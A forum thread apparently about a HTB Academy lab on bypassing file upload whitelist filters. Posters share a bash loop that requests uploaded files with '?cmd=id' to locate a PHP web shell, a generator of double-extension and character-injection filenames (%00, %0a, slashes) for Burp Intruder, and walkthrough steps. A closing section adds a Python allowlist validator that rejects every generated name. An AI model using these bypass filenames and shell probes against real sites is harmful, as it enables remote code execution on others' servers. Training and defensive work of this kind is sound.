File Upload Attacks - Whitelist Filters

Hey,

Thanks a lot. With your help I solved this :)

For those who are still struggling - EZi0’s comment will get you what you need.

Some steps to help you:

  1. Modify the script that HTB Academy provides to generate your wordlist.txt file with a few extra extensions (e.g. .phar and .phtml).
  2. In Burp Intruder, send each POST request with a PHP payload and the filenames created by the script.
  3. Curl each endpoint and supply ‘?cmd=id’ to check for successful 200s.

This is the script I like to use to automate commands, feeding in a wordlist as a variable, e.g. ./repeat.sh wordlist.txt

#!/bin/bash
# usage: ./repeat.sh wordlist.txt
# Reads the wordlist one filename per line into $line and requests each one,
# printing only the response headers (-I) so the status code is easy to scan.

input=$1
while IFS= read -r line
do
        echo "doing $line:"
        curl -I "http://139.59.171.86:32638/profile_images/$line?cmd=id"
done < "$input"

Hope that helps

5 Likes

If you haven’t solved it, from what I can remember you are super close; try more combinations of characters. The file will be uploaded with the extension you try and will be reachable, you just need to find the right one.

1 Like

Was stuck here for a long time trying to get character injection techniques to work and was not successful. I was able to upload files successfully with character injection, but attempts to reference them always came back as 404. I thought this was working because phps was giving me no permissions, but I found anything.phps gave the same error, so that message wasn’t indicative of anything.

The advice in this thread around expanding the extensions beyond what you use in the script is helpful. What I then noticed is that phar and phtml had a lot more “successes” than php with character injection. Even though I didn’t end up using character injection, this sparked the realization that they were treated differently and that a simpler approach with those might work.

Wish I had been able to get character injection going. I tried running the curl script after the upload script but just got Not Found on every file link. I also tried just removing the characters, since I would think the goal is that these injections save your file as shell.php, but that didn’t work either. In the end, I still got there though.

1 Like

Quick tip: the example from “Reverse Double Extension” works fine for this task (but not with .php, try a different one) :)

2 Likes

You can also try this tool: GitHub - almandin/fuxploider: File upload vulnerability scanner and exploitation tool.

1 Like

Let me clear up the hint because it came off a bit confusing.
You can solve it using either:

  • Reverse Double Extension
  • Character Injection

Reverse Double Extension:

=======================
The easier one to solve.
Create a wordlist where each filename:

  • Starts with a PHP extension, i.e. php
  • Ends in a picture format, i.e. jpg
    Something like shell.php.jpg

=======================

Character Injection

======================
Trickier, because you get a successful upload for a lot of results. However, when trying to open their URLs you get 404 Not Found.
I did notice that if you open some via the webpage (right click, open image in new tab) the URL would be different, but no need to go down this rabbit hole as I did; none of them worked either.
All I can do is expand on what “magic” said, because they were right.

Create a wordlist from the page it gives you and add some extra PHP extensions only, i.e. php5, pht, phtml etc.
After Intruder has finished, run the script “magic” provided.
You will eventually get a 200 response. That’s where the shell is.
Otherwise you will be looking at over 300 files that were successfully uploaded, checking them manually.

1 Like

Create wordlist.txt

# For every injected character and PHP extension, emit the four placements
# the module describes: char before/after the PHP extension, and the PHP
# extension before/after the image extension.
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
  for ext in '.php' '.phps' '.phar' '.phtml'; do
    echo "hack$char$ext.jpg" >> wordlist.txt
    echo "hack$ext$char.jpg" >> wordlist.txt
    echo "hack.jpg$char$ext" >> wordlist.txt
    echo "hack.jpg$ext$char" >> wordlist.txt
    echo "hack$char$ext.png" >> wordlist.txt
    echo "hack$ext$char.png" >> wordlist.txt
    echo "hack.png$char$ext" >> wordlist.txt
    echo "hack.png$ext$char" >> wordlist.txt
    echo "hack$char$ext.jpeg" >> wordlist.txt
    echo "hack$ext$char.jpeg" >> wordlist.txt
    echo "hack.jpeg$char$ext" >> wordlist.txt
    echo "hack.jpeg$ext$char" >> wordlist.txt
  done
done

Burp → Intruder → Payloads → Load… wordlist.txt
Burp → Intruder → Payloads → uncheck Payload Encoding
Burp → Intruder → Options → Grep - Match → “Extension not allowed” & “Only images are allowed”

1 Like

This took too many hours for me to complete. The steps I took to complete this task:

  1. Looking at the source code of script.js, you need .jpg, .png, or .jpeg at the end of the filename.

  2. Then, with the wordlist creator code in this module, run a for loop over the PHP extensions so you have output like shell.php.jpg, where .php is something else.

  3. Then run this wordlist through Burp Intruder with payload encoding off. Then I scrolled through and found which ones uploaded successfully and tried those.

  4. You can also use Burp Intruder to find which images you can view. Make sure encoding is off and they will return 200 OK. There are two PHP extensions that work.
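To show the other side of the wordlist post and the steps above, here is an added example (not from the thread, HTB Academy or the target) of a server-side allowlist check that rejects every name the generator produces while still accepting a normal image. The extension table, the SAFE_NAME regex, the JPEG header bytes and the hack/photo filenames are this example's own assumptions.

```python
import re
import secrets
from itertools import product

# Allowlist: final extension -> magic bytes the content must start with.
# The table itself is this example's own choice, not the target's config.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
           "png": b"\x89PNG\r\n\x1a\n"}
JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF"  # constructed JPEG header for tests
# The whole name must be: safe stem, exactly one dot, one short extension.
# A second dot, '%', '/', '\\', ':', whitespace or non-ASCII all fail.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

def validate_upload(filename: str, content: bytes) -> str:
    """Return a server-chosen storage name or raise ValueError.

    Blocks the name tricks in the thread: reverse double extension (shell.php.jpg),
    trailing PHP extension (shell.jpg.php) and character injection (%00, '/', ...),
    because the whole name must match SAFE_NAME and only its one extension counts.
    """
    if not filename.isascii() or any(ord(c) < 0x21 for c in filename):
        raise ValueError("control or non-ASCII character in filename")
    m = SAFE_NAME.fullmatch(filename)
    if m is None:
        raise ValueError("filename not in allowed form")
    ext = m.group(1).lower()
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    if not content.startswith(ALLOWED[ext]):  # check bytes, not just the name
        raise ValueError("content does not match extension")
    # Never store under the user-supplied name; ext comes from our own table.
    return f"{secrets.token_hex(16)}.{ext}"

def thread_wordlist(stem: str = "hack") -> list[str]:
    """Port of the bash generator posted above (constructed test input)."""
    chars = ["%20", "%0a", "%00", "%0d0a", "/", r".\\", ".", "\u2026", ":"]
    exts = [".php", ".phps", ".phar", ".phtml"]
    imgs = [".jpg", ".png", ".jpeg"]
    return [f"{stem}{a}{b}{c}" for x, e, i in product(chars, exts, imgs)
            for a, b, c in ((x, e, i), (e, x, i), (i, x, e), (i, e, x))]

def rejected(names: list[str], content: bytes = JPEG) -> int:
    """Count names validate_upload rejects for the given (default JPEG) bytes."""
    count = 0
    for n in names:
        try:
            validate_upload(n, content)
        except ValueError:
            count += 1
    return count
```

Running rejected(thread_wordlist()) returns 432, i.e. every generated name is refused before the bytes are even looked at, whereas photo.jpg with a JPEG header is stored under a random server-chosen name.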